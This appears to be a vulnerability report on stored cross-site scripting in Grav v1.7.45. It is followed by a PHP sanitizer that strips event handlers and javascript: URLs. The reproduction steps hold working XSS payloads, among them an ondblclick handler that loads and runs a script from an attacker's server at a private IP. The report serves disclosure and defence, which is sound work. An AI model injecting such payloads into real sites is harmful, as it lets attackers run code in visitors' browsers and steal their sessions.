This vulnerability allows users with restricted page creation privileges to insert harmful JavaScript code into the pages they create, potentially compromising the system. To mitigate this risk, robust input validation and content filtering measures must be implemented to prevent the execution of unauthorized scripts and ensure system security.
The following image shows that, according to the admin, this user does not have the privilege to add JavaScript.
The following image shows the version number.
Step 1: Log in to the user account.
Step 2: Create the page with <a ondblclick='alert(1)'><h1>test</h1></a>
as shown in the picture.
Step 3: Navigate to the created page, double-click the link, and note the XSS popup.
Step 4: Load an XSS payload from a third party with the following payload.
<a ondblclick='var s=document.createElement("script");s.src="http://192.168.86.129:9000/test.js";s.onerror=()=>console.error("Error loading script!");document.head.appendChild(s);'><h1>test</h1></a>
Step 5: The following image shows the page after the code is loaded and executed.
Step 6: The following image shows the code loaded and executed from the attacker's server.
* PHP 8.2.12 (cli) (built: Jan 8 2024 06:21:20) (NTS)
* Grav v1.7.45
* Kali Linux
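
One way to implement the content filtering recommended at the top of this report, run against the Step 2 payload. This is an added example, not Grav's own code and not part of the original report. The helper name strip_active_content() is hypothetical; it relies on PHP's bundled DOM extension and also covers script elements and javascript: URLs, which goes beyond the single attribute used in the steps.

```php
<?php
// Added example, not Grav code. strip_active_content() is a hypothetical helper
// for content saved by users who lack the privilege to add JavaScript.
function strip_active_content(string $html): array
{
    $doc = new DOMDocument();
    $prev = libxml_use_internal_errors(true);   // libxml warns on HTML5 tags
    $doc->loadHTML('<?xml encoding="utf-8"?><body>' . $html . '</body>');
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    $removed = [];
    $xpath = new DOMXPath($doc);

    // 1. Drop <script> elements entirely.
    foreach (iterator_to_array($xpath->query('//script'), false) as $node) {
        $removed[] = '<script>';
        $node->parentNode->removeChild($node);
    }

    // 2. Drop every event-handler attribute (onclick, ondblclick, onerror, ...)
    //    and javascript: URLs in href/src.
    foreach ($xpath->query('//*[@*]') as $el) {
        foreach (iterator_to_array($el->attributes, false) as $attr) {
            $name = strtolower($attr->nodeName);
            // Remove whitespace and control characters before checking the scheme.
            $value = strtolower(preg_replace('/[\x00-\x20]+/', '', $attr->nodeValue));
            $isHandler = strncmp($name, 'on', 2) === 0;
            $isJsUrl = in_array($name, ['href', 'src'], true)
                && strncmp($value, 'javascript:', 11) === 0;
            if ($isHandler || $isJsUrl) {
                $removed[] = "<{$el->nodeName} {$name}>";
                $el->removeAttribute($attr->nodeName);
            }
        }
    }

    // Serialize only the children of <body>, i.e. the cleaned fragment.
    $clean = '';
    $body = $doc->getElementsByTagName('body')->item(0);
    foreach ($body ? $body->childNodes : [] as $child) {
        $clean .= $doc->saveHTML($child);
    }
    return ['html' => $clean, 'removed' => $removed];
}

// The payload from Step 2 of this report.
$result = strip_active_content("<a ondblclick='alert(1)'><h1>test</h1></a>");
echo $result['html'], PHP_EOL;
echo 'removed: ', implode(', ', $result['removed']), PHP_EOL;
```

The filter belongs on the server side at save time, keyed on the author's privileges, so the stored page never contains the handler; logging the `removed` list gives an audit trail of rejected markup per user.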